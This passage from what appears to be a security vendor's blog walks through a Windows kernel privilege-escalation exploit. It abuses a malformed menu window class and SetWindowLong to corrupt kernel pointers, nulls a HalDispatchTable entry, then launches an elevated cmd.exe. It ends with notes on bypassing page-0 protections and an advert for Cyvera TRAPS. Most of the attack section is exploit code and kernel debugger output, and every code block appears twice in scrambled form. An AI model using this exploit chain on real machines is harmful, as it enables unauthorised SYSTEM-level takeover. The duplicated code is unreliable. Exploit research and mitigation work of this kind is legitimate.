addr = NULL;
SUCCESS_OR_FAIL(AllocateTrampoline(&addr));

printf("[*] Preparing trampoline... ");

addr = NULL;

SUCCESS_OR_FAIL(AllocateTrampoline(&addr));

The next thing we want to do is to create the disparity between the size of the fnid window saved in gpsi, and the size reported by the actual menu window class:

/* Change the fnid table to have just 0 extra bytes instead of 4 for the menu class */
ZeroMemory(&wndClassEx, sizeof(wndClassEx));
wndClassEx.cbSize = sizeof(wndClassEx);
wndClassEx.style = CS_HREDRAW | CS_VREDRAW;
wndClassEx.lpfnWndProc = WindowProc;
wndClassEx.cbWndExtra = 0;
wndClassEx.hInstance = GetModuleHandle(NULL);
wndClassEx.lpszClassName = L"ExploitClass";
printf("[*] Registering malformed class... ");
clsAtom = fnRegisterClassExWOWW(&wndClassEx, 0, FNID_MENU, 0);
SUCCESS_OR_FAIL(clsAtom != 0);

/* Change the fnid table to have just 0 extra bytes instead of 4 for the menu class */

ZeroMemory(&wndClassEx, sizeof(wndClassEx));

wndClassEx.cbSize = sizeof(wndClassEx);

wndClassEx.style = CS_HREDRAW | CS_VREDRAW;

wndClassEx.lpfnWndProc = WindowProc;

wndClassEx.cbWndExtra = 0;

wndClassEx.hInstance = GetModuleHandle(NULL);

wndClassEx.lpszClassName = L"ExploitClass";

printf("[*] Registering malformed class... ");

clsAtom = fnRegisterClassExWOWW(&wndClassEx, 0, FNID_MENU, 0);

SUCCESS_OR_FAIL(clsAtom != 0);

After performing these commands, the fnid table is going to show size 0xa4 (== sizeof(WND)) for menu windows, while the menu window class still (correctly) shows cbWndExtra == 4. This will allow us to change one DWORD of data using SetWindowLong at offset 0 of the extra bytes (the ppopupmenu pointer).

Now we need to create a menu window. Calling CreatePopupMenu from user mode doesn’t help much in creating something interesting, as the kernel simply allocates memory for a menu object (see InternalCreateMenu). We need to find a way to actually create a window for a menu. As mentioned earlier, we cannot simply use CreateWindow/CreateWindowEx. If we simply try it with the menu window class (0×8000) we are going to fail.

If we try creating a window out of our malformed class that has an fnid of 0x29c (FNID_MENU), we are not going to get the xxxMenuWindowProc to run at all. First of all, when we register our class we cannot give the address of xxxMenuWindowProc as our window procedure (even if we know the address, RegisterClassExWOWW will just fail). So we must use an address in user space. xxxCreateWindowEx calls MapClientNeuterToClientPfn to determine the window procedure to use. The first argument is a pointer to our class object, and the second should be a default window procedure to use. In our case, xxxCreateWindowEx passes NULL. The function itself is:

WNDPROC __stdcall MapClientNeuterToClientPfn(tagCLS *pcls, WNDPROC *defWndProcToUse, int dummy)
{
    WNDPROC result; // eax@1
    unsigned __int16 v4; // cx@3

    result = defWndProcToUse;
    if (!defWndProcToUse)
        result = pcls->lpfnWndProc;
    v4 = LOWORD(pcls->fnid);
    if (v4 >= 0x2A1u && v4 <= 0x2A9u)
    {
        // Omitted - we never get here (FNID_MENU == 0x29c)
    }
    return result;
}

WNDPROC __stdcall MapClientNeuterToClientPfn(tagCLS *pcls, WNDPROC *defWndProcToUse, int dummy)

{

WNDPROC result; // eax@1

unsigned __int16 v4; // cx@3

result = defWndProcToUse;

if (!defWndProcToUse)

result = pcls->lpfnWndProc;

v4 = LOWORD(pcls->fnid);

if (v4 >= 0x2A1u && v4 <= 0x2A9u)

{

// Omitted - we never get here (FNID_MENU == 0x29c)

}

return result;

}

So we’re stuck with our own window procedure in user mode, that cannot do anything interesting, let alone manipulate a kernel object directly. We must find a way to create a window from a menu class, with xxxMenuWindowProc as its window procedure, and get a handle to it. Fortunately, as we’ve seen before, xxxTrackPopupMenuEx creates a menu window for us, and it can be called from user mode. Now we just need to get a handle to that window. In order to do that, we use the FindWindow function, supplying it with 0×8000 – the class atom of a menu window. The trick is to know when to do that. We do that exactly when we receive the WM_INITPOPUP message to our own window procedure.

/* Create a menu and a window to receive the menu window's messages */
printf("[*] Creating window to handle menu messages... ");
hWnd = CreateWindow(clsAtom, NULL, 0, 0, 0, 1, 1, NULL, NULL, NULL, NULL);
SUCCESS_OR_FAIL(hWnd != NULL);
printf("[*] Creating menu... ");
hMenu = CreatePopupMenu();
SUCCESS_OR_FAIL(hMenu != NULL);
if (!AppendMenu(hMenu, MF_STRING, 1, L"You had better install Cyvera TRAPS"))
	printf("Could not append to menu\n");

/* This will create a menu window in the kernel and start the exploitation process */
TrackPopupMenu(hMenu, 
	TPM_LEFTALIGN | TPM_RIGHTBUTTON, 
	0, 0, 0, hWnd, NULL);

/* Create a menu and a window to receive the menu window's messages */

printf("[*] Creating window to handle menu messages... ");

hWnd = CreateWindow(clsAtom, NULL, 0, 0, 0, 1, 1, NULL, NULL, NULL, NULL);

SUCCESS_OR_FAIL(hWnd != NULL);

printf("[*] Creating menu... ");

hMenu = CreatePopupMenu();

SUCCESS_OR_FAIL(hMenu != NULL);

if (!AppendMenu(hMenu, MF_STRING, 1, L"You had better install Cyvera TRAPS"))

printf("Could not append to menu\n");

/* This will create a menu window in the kernel and start the exploitation process */

TrackPopupMenu(hMenu,

TPM_LEFTALIGN | TPM_RIGHTBUTTON,

0, 0, 0, hWnd, NULL);

And our window procedure is:

LRESULT CALLBACK WindowProc(
  _In_  HWND hwnd,
  _In_  UINT uMsg,
  _In_  WPARAM wParam,
  _In_  LPARAM lParam
)
{
	if (uMsg == WM_INITMENUPOPUP)
		Exploit();
	return DefWindowProc(hwnd, uMsg, wParam, lParam);
}

LRESULT CALLBACK WindowProc(

_In_ HWND hwnd,

_In_ UINT uMsg,

_In_ WPARAM wParam,

_In_ LPARAM lParam

)

{

if (uMsg == WM_INITMENUPOPUP)

Exploit();

return DefWindowProc(hwnd, uMsg, wParam, lParam);

}

Where Exploit does this:

void Exploit() {

	HANDLE hwndMenu;
	DWORD res;
	DWORD *ptr;

	printf("[*] Finding menu window... ");
	hwndMenu = FindWindow(0x8000, NULL);
	SUCCESS_OR_FAIL(hwndMenu != NULL);
	printf("[*] Trashing popup pointer... ");
	res = SetWindowLong(hwndMenu, 0, &tpm);
	SUCCESS_OR_FAIL(res != 0 || GetLastError() == 0);
	printf("[*] Destroying popup window... ");
	res = DestroyWindow(hwndMenu);
	SUCCESS_OR_FAIL(res != 0);
}

void Exploit() {

HANDLE hwndMenu;

DWORD res;

DWORD *ptr;

printf("[*] Finding menu window... ");

hwndMenu = FindWindow(0x8000, NULL);

SUCCESS_OR_FAIL(hwndMenu != NULL);

printf("[*] Trashing popup pointer... ");

res = SetWindowLong(hwndMenu, 0, &tpm);

SUCCESS_OR_FAIL(res != 0 || GetLastError() == 0);

printf("[*] Destroying popup window... ");

res = DestroyWindow(hwndMenu);

SUCCESS_OR_FAIL(res != 0);

}

And that’s it – we’ve nulled a pointer in the HalDispatchTable. All that’s left is to call the function that will use that pointer to run our code (starting from the trampoline and moving on to the token-changing function). After we do that, we can simply spawn a shell:

NtQueryIntervalProfile(2, 0);

printf("[*] Launching cmd... ");
SUCCESS_OR_FAIL(RunProcess(L"C:\\Windows\\system32\\cmd.exe") == TRUE);

NtQueryIntervalProfile(2, 0);

printf("[*] Launching cmd... ");

SUCCESS_OR_FAIL(RunProcess(L"C:\\Windows\\system32\\cmd.exe") == TRUE);

We can see the result of running the exploit here (note the user for process 3500):

Some More Creativeness

Microsoft patched the ability to allocate page 0 on April this year, but, for example, on Windows 7 this is enforced by default only on 64-bit systems. But even if you cannot allocate page 0, you don’t really have to use the NULL page to abuse this vulnerability. Here are some constructs you can use:

You can set a pointer to NULL, as we’ve already seen.
You can decrement a number by 1, as demonstrated with the cLockObj field.
You can OR a number with 0×8000, when the popup menu is marked as “destroyed”.

Of course, this means you may be corrupting more pieces of kernel memory (with the obvious implications), but it is surely doable:

Connected to Windows XP 2600 x86 compatible target at (Fri Sep 20 10:45:34.361 2013 (UTC + 3:00)), ptr64 FALSE Kernel Debugger connection established. Symbol search path is: SRV*D:\Symbols*http://msdl.microsoft.com/download/symbols Executable search path is: Windows XP Kernel Version 2600 UP Free x86 compatible Built by: 2600.xpsp_sp3_gdr.111025-1629 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 System Uptime: not available Single step exception - code 80000004 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 001b:007268c2 8d55b8 lea edx,[ebp-48h] kd> ba e 1 0x00ffffff kd> g Breakpoint 0 hit 00ffffff e9cc1740ff jmp 004017d0 kd> kv ChildEBP RetAddr Args to Child WARNING: Frame IP not in any known module. Following frames may be wrong. b10b6cfc 8063d59d 00000001 0000000c b10b6d14 0xffffff b10b6d20 8060eb13 00000002 b10b6d64 0012ff60 nt!KeQueryIntervalProfile+0x37 (FPO: [Non-Fpo]) b10b6d54 8053d6d8 00000002 0012ff74 0012ff7c nt!NtQueryIntervalProfile+0x61 (FPO: [Non-Fpo]) b10b6d54 7c90e514 00000002 0012ff74 0012ff7c nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b10b6d64) 0012ff4c 7c90d84a 0040177c 00000002 0012ff74 ntdll!KiFastSystemCallRet (FPO: [0,0,0]) 0012ffd0 80544cfd 0012ffc8 81e019e8 ffffffff ntdll!NtQueryIntervalProfile+0xc (FPO: [2,0,0]) 00130010 00000000 00000020 00000000 00000014 nt!ExFreePoolWithTag+0x417 (FPO: [Non-Fpo])

Disallowing allocations of page 0 will indeed thwart some attacks, but as we can see, in this case we can easily use higher addresses for our exploit. To effectively close this class of attacks and force attackers to be much more creative, a hardware-assisted solution like SMEP (Supervisor Mode Execution Protection) is necessary.

Cyvera TRAPS obstructs such exploitation techniques and provides advanced exploit-mitigation mechanisms (including hardware-assisted ones) even for operating systems that do not support those mitigations natively.